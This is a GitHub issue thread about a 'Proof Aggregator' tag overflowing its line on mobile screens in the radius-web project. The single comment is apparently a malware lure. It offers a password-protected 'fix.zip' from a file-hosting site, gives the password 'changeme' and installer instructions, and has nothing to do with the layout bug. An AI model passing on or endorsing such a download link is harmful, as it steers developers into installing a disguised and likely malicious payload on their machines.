### ISSUE TITLE
`Proof Aggregator` tag is too long to fit in a single line

### ISSUE THREAD

**Issue by gylman** [radiusxyz/radius-web#57]
### System Information

Darwin Abcds-MacBook-Pro.local 22.4.0 Darwin Kernel Version 22.4.0: Mon Mar  6 20:59:58 PST 2023; root:xnu-8796.101.5~3/RELEASE_ARM64_T6020 arm64

### Description

 `Proof Aggregator` tag is too long to fit in a single line on mobile screens, it distorts UI:

![image](https://github.com/user-attachments/assets/14da9d34-5692-4955-9c5f-cebcc8cf4de2)

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
